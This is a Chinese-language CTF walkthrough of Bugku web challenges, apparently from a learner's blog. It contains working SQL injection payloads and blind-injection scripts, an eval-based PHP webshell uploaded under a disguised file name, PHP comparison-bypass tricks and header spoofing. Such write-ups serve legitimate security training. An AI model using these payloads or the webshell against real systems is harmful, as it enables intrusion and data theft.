margin 是css的一个属性给的flag再解密一次就是数字:895974

那是不是直接通过post传一个margin=895974就可以了

因为每次刷新都会变化我们用python来

import requests
import base64
import re
url='http://123.206.87.240:8002/web6/'
r=requests.session()
s=r.get(url)
flag=s.headers['flag']
mid=base64.b64decode(flag)
mid=mid.decode()
flag=base64.b64decode(mid.split(':')[1])
data={'margin':flag}
print (r.post(url,data=data).text)

跑一下就出来了KEY{111dd62fcd377076be18a}

cookies欺骗

页面上给的是一串重复的东西,也没看出来是啥

倒是地址栏有很明显base64加密

a2V5cy50eHQ=

解开是keys.txt

吧这个位置换成加密的index.php看看,是有回显的

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw每次改变他的line值会显示不同行的php代码用python给他爬出来

import requests
for i in range(30):
	url='http://123.206.87.240:8002/web11/index.php?line='+str(i)+'&filename=aW5kZXgucGhw'
	r=requests.get(url)
	print(r.text)

跑一下得到:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

最直接就是$_COOKIE['margin']=='margin'了我们进到keys.php(base64加密)hackbar传一个cooick的值margin=margin进去右键查看源码就好了

never give up

进去地址栏有个id=1直接改这个没反应

f12发现

<!--1p.html-->

于是到1p.html看看

直接进页面好像是进不去的

那就view-source:123.206.87.240:8006/test/1p.html

直接看源码发现有一段加密了先用url解码得到

"<script>window.location.href='http://www.bugku.com';</script> 
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->"

再把中间的用base64解码

%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E

再用url解

";if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("f4l2a3g.txt");
}
else
{
	print "never never never give up !!!";
}


?>

可以看到有一个f4l2a3g.txt文件直接访问view-source:http://123.206.87.240:8006/test/f4l2a3g.txt

得到flag

welcome to bugkuctf

靶场进不去

过狗一句话

靶场进不去

字符?正则?

<?php 
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){ 
  die('key is: '.$key);
}
?>

就一个正则

通过get传一个id进去

这个id要符合/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i这个正则

. 匹配除 "\n" 之外的任何单个字符

* 匹配它前面的表达式0次或多次,等价于{0,}

{4,7} 最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字符

\/ 匹配 / ,这里的 \ 是为了转义

[a-z] 匹配所有小写字母

[:punct:] 匹配任何标点符号

/i 表示不分大小写

就见payloadhttp://120.24.86.145:8002/web10/?id=keykeyaaaakey:/a/keya:flag就出来了

前女友(SKCTF)

刚打开啥都不知道,查看源码发现链接俩字那里有链接点一下跳另外一个页面

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

要求v1不等于v2md5(v1)=MD5(v2)v3等于$flag

那v1 v2找一个MD5之后是0e开头的就可以绕过了 但是v3怎么办

在查strcmp的时候看见一个相关漏洞

在5.3之前的php中,果我们传入非字符串类型的数据的时候,显示了报错的警告信息后,将return 0 !!! 也就是虽然报了错,但却判定其相等了。那么只要v3传个数组进去,flag就出来了

payloadhttp://123.206.31.85:49162/?v1=s878926199a&v2=s155964671a&v3[]=12

login1(SKCTF)

题目提示sql约束攻击

进去是一个普通的登录界面,先注册个账号看看,登录提示不是管理员

因为注册的时候密码有大小写数字爆破有难度

就去查了一下sql约束有一个是再sql查询的时候自动去空格admin=admin ___

那就注册一个admin___让再判断是否为管理员的的时候返回ture就好了登录flag就出来了

你从哪里来

进去就问我是不是来自谷歌,bp抓包加个referer:https://www.google.com就说我来自谷歌就好了

md5 collision(NUPT_CTF)

题目是MD5 collision 让我输入a通过地址栏传一个a=1进去返回false那就传个MD5之后0e开头的flag就出来了

payloadhttp://123.206.87.240:9009/md5.php?a=s878926199a

md5之后0e开头的

因为做过好几道md5 collision的题就对做过做个整理

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

程序员本地网站

之前过的管理员系统是类似的直接在包头加上X-FORWARDED-FOR:127.0.0.1就好了

各种绕过

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])

        print 'passwd can not be uname.';

    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))

        die('Flag: '.$flag);

    else

        print 'sorry!';

}
?>

id=margin uname不等于passwd sha1之后相等

我再找sha1之后相等的支付的时候找到

sha1比较数组漏洞: uname[]=1&passwd[]=23 即可绕过 (注:数组数字可任意)

payload ge:thttp://123.206.87.240:8002/web7/?id=margin&uname[]=1post:passwd[]=23

flag就出来了

web8

题目提示txt???先进靶场

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>

进到flag.txt看看

里面显示flags

那么ac就是flag.txt的内容flags fn就是flag.txt文件名

payloadhttp://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt

flag就出来了

细心

靶场进不去

求getshell

他要我传一个image文件不要php文件,看上去就是一个文件上传的题

先见传个一句话返回文件错误,用bp改参数刚开始就知道两个一个是文件名一个是请求数据的Content-Type,文件名就一个一个尝试,Content-Type用图片的就可以,但是怎么尝试都不行,后来查了一下发现头部还有一个 Content-Type 大小写绕过一下就好

INSERT INTO注入

error_reporting(0);

function getIp(){ //获取ip
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //读取报头里的HTTP_X_FORWARDED_FOR
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; //要注入的语句
mysql_query($sql);

先看看题目给的源码。提示提示写python脚本,因为没有报错点只能用时间盲注了。

import requests

dic='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUZWXYZ_'
#猜解数据库名称的payload
payload_db = "1'+(select case when (substr(database() from {0} for 1)='{1}') then sleep(6) else 1 end)+'1"
#猜解表数量的payload
payload_tb_num = "1'+(select case when (select count(*) from information_schema.TABLES where TABLE_SCHEMA='{0}')='{1}' then sleep(6) else 1 end)+'1"
#猜解表名字长度的payload,注:其实也可不猜解长度,直接猜解具体字符,当发现名称字符串不变时(即不再捕获到ReadTimeout异常添加字符时)说明猜解完成
payload_tb_name_len = "1'+(select case when (select length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) = '{2}' then sleep(6) else 1 end)+'1"
#猜解表名字的payload
payload_tb_name = "1'+(select case when (substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='{0}' limit 1 offset {1}) from {2} for 1)) = '{3}' then sleep(6) else 1 end)+'1"
url = 'http://123.206.87.240:8002/web15/'

db_name = ''
#数据库名破解
for i in range(1,6):
    for j in dic:
        try:
            headers = {'x-forwarded-for':payload_db.format(i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            print(payload_db.format(i,j))
            db_name += j
            break
print('db_name: ' + db_name) #运行后可知数据库名为web15
#表数量破解
tb_num = 0
for i in range(1,50):
    try:
        headers = {'x-forwarded-for':payload_tb_num.format(db_name,str(i))}
        res = requests.get(url,headers=headers,timeout=5)
    except requests.exceptions.ReadTimeout:
        tb_num = i
        print('tb_num: '+str(i))
        break
#运行后可知有两个表
#表名破解
len = 0
for i in range(tb_num):
    #crack length first
    for j in range(50):
        try:
            headers = {'x-forwarded-for':payload_tb_name_len.format(db_name,i,j)}
            res = requests.get(url,headers=headers,timeout=5)
        except requests.exceptions.ReadTimeout:
            len = j
            break
    print('No.'+str(i+1)+' table has length: ' + str(len))
    #crack name
    tb_name = ''
    for k in range(1,len + 1):
        for j in dic:
            try:
                headers = {'x-forwarded-for':payload_tb_name.format(db_name,i,k,j)}
                res = requests.get(url,headers=headers,timeout=5)
            except requests.exceptions.ReadTimeout:
                print(payload_tb_name.format(db_name,i,k,j))
                tb_name += j
                break
        print(tb_name)
	#运行后可知两个表为flag和client_ip

python不行这个是网上拉的,自己跑了了一下就看看懂可以改

import requests

url="http://123.206.87.240:8002/web15/"

flag=""

for i in range(1,33):

    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.":

        data="1' and (case when (substr((select group_concat(flag) from flag) from " + str(i)+" for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"

        headers={'X-ForWarded-For':data}

        try:

            result=requests.get(url,headers=headers,timeout=3)

        except requests.exceptions.ReadTimeout:

            flag+=str1

            print(flag)

            break

print(flag)

跑完flag就出来了。。。。

这是一个神奇的登陆框

进去就一个登陆界面,地址来看有个sql应该还是失去了注入题那就开始找注入点

1"的时候出现报错

Try Again!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1"' at line 1

输入1" #又正常了那就是"闭合

1" order by 2 #正常1" order by 3 #返回

Unknown column '3' in 'order clause'

那就是两个字段

-1" union select 1, 2 #手历一下

返回

Good Job!
Login_Name:1
You must login with correct ACCOUNT and PASSWORD!

爆库

-1" union select database(),2#

得到库名bugkusql1

爆表

-1" union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

得到表名flag1,whoami

爆字段

-1" union select group_concat(column_name),2 from information_schema.columns where table_name='flag1'#

得到字段flag1

查数据开始

-1" union select group_concat(flag1),2 from flag1 #

flag 就出来了

-1" union select *,2 from flag1 #

这样也是可以的就可以不用去查字段了

多次

进去地址栏又个id=1改了会显示不同的字一直到5,之后就出现

Error,Error,Error!

很明显的注入题

id=5的时候他让我给我尝试sql注入,那就直接开始

id=1'报错

id=1"不报错

所以是'闭合

确定存在注入点

试了一下发现是有过滤的

用异或注入来判断一下

payloadhttp://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)--+

判断出来过滤了and,or,union,select

这边可以用双写绕过

order by来判断字段数http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+

2的时候不报错3的时候报错了

手历一下

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,2 --+

显示2

爆库:

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,database() --+

web1002-1

爆表

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema="web1002-1"--+

flag1,hint

爆字段

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name="flag1"--+

flag1,address

查数据

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(flag1) from flag1--+

usOwycTju+FTUUzXosjr

去试了一下这个不是 那就去拿address里的数据

http://123.206.87.240:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(address) from flag1--+

得到下一关地址

也是地址栏来传id

'闭合注入点有了

这关双写绕过和大小写绕过都过滤了,那就用报错注入

http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+返回正常

3报错 Unknown column '3' in 'order clause'

那就是两个字段

爆表

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e,database(),0x7e)))--+

得到XPATH syntax error: '~web1002-2~'

爆表

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema="web1002-2"),0x7e)))--+

得到XPATH syntax error: '~class,flag2~'

爆字段

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name="flag2"),0x7e)))--+

得到XPATH syntax error: '~flag2,address~'

查数据

http://123.206.87.240:9004/Once_More.php?id=1' and (extractvalue(1,concat(0x7e, (select group_concat(flag2) from flag2),0x7e)))--+

得到XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

把B改小写就是了

去看一下第三关

XPATH syntax error: '~./Have_Fun.php~'

进去是空白页面,查看下源码

<!DOCTYPE html>
<html>
<head>
	<title>Have_Fun</title>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- <style>
html,body{
	padding: 0;
	margin: 0;
	background-color: #fff;
}
Only IP'1234' can access this site.
<style>  -->
</head>
<body>                        
</body>
</html>
<center><font  color= '#fff'>YOUR IP:39.172.208.228<br />Sorry,Only IP:192.168.0.100 Can Access This Site<br /><br></font></center>

需要抓包改,晚点再回来研究

PHP_encrypt_1(ISCCCTF)

一个压缩包里面是index.php题目上给出fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=

<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) { 
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

大概理解了,就是我密钥提供一个字符串用这个函数运行后变成题目给的那个字符串,那就是要我直接写一个解密程序

<?php

function decrypt()
{
    $miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";	//这是给定的进行base64编码过后的密文
    $mi1 = base64_decode($miwen);				//先进行base64解码

    $char ="";
    $str="";
    $len = strlen($mi1);						//获取密文长度

    $key = md5('ISCC');							//与加密函数中的相同操作,目的是在后续得到与加密过程中使用的相同的密钥。
    $x = 0;
    $klen = strlen($key);						//key的长度

    for ($s=0; $s < $len; $s++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];						//每次截取key的第x位并拼接给char(char作为最终的加密密钥),在这里便得到了加密密钥,这里的加密密钥和解密密钥相同。
        $x+=1;
    }

    for ($i=0; $i < $len; $i++) {				//后面是解密的核心
        $xia = ord($mi1[$i])-ord($char[$i]) ;	//加密过程中这一步是两者相加并对128做模运算(取余)。
        if($xia < 0){
            $str .= chr($xia+128);
        }
        else{
            $str .= chr((ord($mi1[$i]) - ord($char[$i])) % 128); //将data和char的第i位字符的ascii码相加并与128取模得到新的字符(也即是密文)
        }
    }
    echo $str."\n";
}
decrypt();
?>

跑一下flag就出来了

文件包含2

提示文件包含

地址http://123.206.31.85:49166/index.php?file=hello.php

查看源码<!-- upload.php -->开头提示upload.php

上一句话改后缀,上传成功,但是不管这直接访问还是用文件包含菜刀和蚁剑都连不上去,

后来把一句话改了

<script language=php>echo 'a'; eval($_POST['pass']);</script>

文件名改了a.php;.jpg上传成功,文件包含读取返回一个a,用蚁剑直接脸上,找到一个this_is_th3_F14g_154f65sd4g35f4d6f43.txt的文件打开就是flag

flag.php

怎么点login都没反应

回去看题目给的提示

提示:hint

看源码也没东西

只能去找大佬的wp了

看大佬们都是通过get传一个hint=1进去源码就出来了,但是我试了试了得到了

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

看了一些不是很麻烦传个cookie过去这有个坑

这个$key是再下面的所以再上面半个语句里是未定义的。

所以unserialize($cookie)返回的是null

所以我们要传一个s:0:" ";

只要构建cookie: ISecer=s:0:" ";就好了

我用火狐直接传不行就用bp抓包改了cookie,flag就出来了

sql注入2

题目提示全都tm过滤了绝望吗?提示 !,!=,=,+,-,^,%

随便试了一下用户名为admin的时返回密码错误,那账号就确定了,那就密码,本来想用爆破的,但是密码有点长。。。。。

还是好好做题吧

但是。。我直接地址栏后面跟http://123.206.87.240:8007/web2/flag就把flag下载下来了。。。。

孙xx的博客

这题一点感觉都没有题号好像改了,也找不到wp。。。

Trim的日记本

拿御剑一扫描有一个http://123.206.87.240:9002/show.php

进去flag就出来了

login2(SKCTF)

题目提示命令执行

靶场坏了,一直提示无法链接数据库

login3(SKCTF)

题目提示基于布尔的sql盲注

有提示无法链接数据库

文件上传2(湖湘杯)

页面打不开

江湖魔头

先放一放太难了

login4

题目提示CBC字节翻转攻击

进去是登录框,随便输入说我不是管理员,用admin登录又说管理员不需要登录,抓包看看

cookie里面有

Cookie: PHPSESSID=geaegok09kdgpv30reekm2uvb5; user=UTw%2BPCx%2FempFfml9eypON1KVb1YjKDBlbWx3mTBbdSIVFBRhoQ%3D%3D

先去查一下什么是CBC字节翻转攻击

找到一篇很详细的博客https://blog.csdn.net/csu_vc/article/details/79619309

御剑扫一下发先有一个index.php.swp

到linux下,用命令 vim -r index.php.swp 就可以恢复,源码搞下来

<!DOCTYPE html PUBLIC "-//W4C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>Login Form</title>
    <link href="static/css/style.css" rel="stylesheet" type="text/css"/>
    <script type="text/javascript" src="static/js/jquery.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function () {
            $(".username").focus(function () {
                $(".user-icon").css("left", "-48px");
            });
            $(".username").blur(function () {
                $(".user-icon").css("left", "0px");
            });

            $(".password").focus(function () {
                $(".pass-icon").css("left", "-48px");
            });
            $(".password").blur(function () {
                $(".pass-icon").css("left", "0px");
            });
        });
    </script>
</head>

<?php
define("SECRET_KEY", file_get_contents('/root/key'));
define("METHOD", "aes-128-cbc");
session_start();

function get_random_iv()
{
    $random_iv = '';
    for ($i = 0; $i < 16; $i++) {
        $random_iv .= chr(rand(1, 255));
    }
    return $random_iv;
}

function login($info)
{
    $iv = get_random_iv();
    $plain = serialize($info);
    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    $_SESSION['username'] = $info['username'];
    setcookie("iv", base64_encode($iv));
    setcookie("cipher", base64_encode($cipher));
}

function check_login()
{
    if (isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])) {
        $cipher = base64_decode($_COOKIE['cipher']);
        $iv = base64_decode($_COOKIE["iv"]);
        if ($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)) {
            $info = unserialize($plain) or die("<p>base64_decode('" . base64_encode($plain) . "') can't unserialize</p>");
            $_SESSION['username'] = $info['username'];
        } else {
            die("ERROR!");
        }
    }
}

function show_homepage()
{
    if ($_SESSION["username"] === 'admin') {
        echo '<p>Hello admin</p>';
        echo '<p>Flag is $flag</p>';
    } else {
        echo '<p>hello ' . $_SESSION['username'] . '</p>';
        echo '<p>Only admin can see flag</p>';
    }
    echo '<p><a href="loginout.php">Log out</a></p>';
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    if ($username === 'admin') {
        exit('<p>admin are not allowed to login</p>');
    } else {
        $info = array('username' => $username, 'password' => $password);
        login($info);
        show_homepage();
    }
} else {
    if (isset($_SESSION["username"])) {
        check_login();
        show_homepage();
    } else {
        echo '<body class="login-body">
                <div id="wrapper">
                    <div class="user-icon"></div>
                    <div class="pass-icon"></div>
                    <form name="login-form" class="login-form" action="" method="post">
                        <div class="header">
                        <h1>Login Form</h1>
                        <span>Fill out the form below to login to my super awesome imaginary control panel.</span>
                        </div>
                        <div class="content">
<input name="username" type="text" class="input username" value="Username" onfocus="this.value=\'\'" />
                        <input name="password" type="password" class="input password" value="Password" onfocus="this.value=\'\'" />
                        </div>
                        <div class="footer">
                        <input type="submit" name="submit" value="Login" class="button" />
                        </div>
                    </form>
                </div>
            </body>';
    }
}
?>
</html>
L1nr
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
CTF-web基础$_POST
三天不打上房揭瓦的博客
08-15 2037
前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 网址:web基础$_POST 1.进入网址可以看到如下代码。 2.分析该代码,得出只需要传 what参数等于flag即可得出答案。即和GET代码原理一样。 $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 3.这里使用一个小插件来通过此关。hackber 火狐浏览器可以添加的插件,通过hackber来获取到 flag,最终答
CTF-Web(Post)
Zhang_hongchao的博客
01-25 969
题目:打开网址后显示以下内容: $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 使用POST请求可以直接获取flag。 python代码: payload=dict(what='flag') r=requests.post('http://114.67.246.176:16179',data=payload) print(r.text) 可以直接获取flag为 flagflag{13c5f0c1a1a2.
2024年网络安全最全CTF BugKu平台———(Web②)_buktu攻防平台(1),互联网寒冬公司倒闭后
最新发布
2401_84267585的博客
05-06 870
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。大概的意思就是v1不等于v2,v1和v2的md5相等,strcmp是比较字符串(区分大小写),v3不等于flag。方法2 :根据if($ac === $f),构造?fn=flag.txt,&ac=bugku,最后得到flag。大概就是使uname的sha1和值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等。(考的MD5碰撞,网上有很多随便找一个即可。
BugkuCTF webweb基础$_POST; 矛盾
s0il的博客
12-18 1738
web基础$_POST php代码是: $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 用postman发送一个post请求,body里的参数是KEY=what     VALUE=flag response回应得到答案  flag{bugku_get_ssseint67se} 矛盾 php...
Bugku——web
chongya927的博客
03-05 1379
菜鸟学习CTF之路
Pwn The Box——Post
龙狼刺的博客
08-11 147
发现在what后面提交flag的时候,才会显示flag值。
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
BUGKU-WEB POST
天泽岁月
02-14 376
BUGKU-WEB POST
BUGKU--web详解
qq_49422880的博客
05-28 1963
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造一级目录一级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造一个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
CTF练习题WP1
m0_73891130的博客
03-25 620
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
bugku ctf Web POST 解题思路
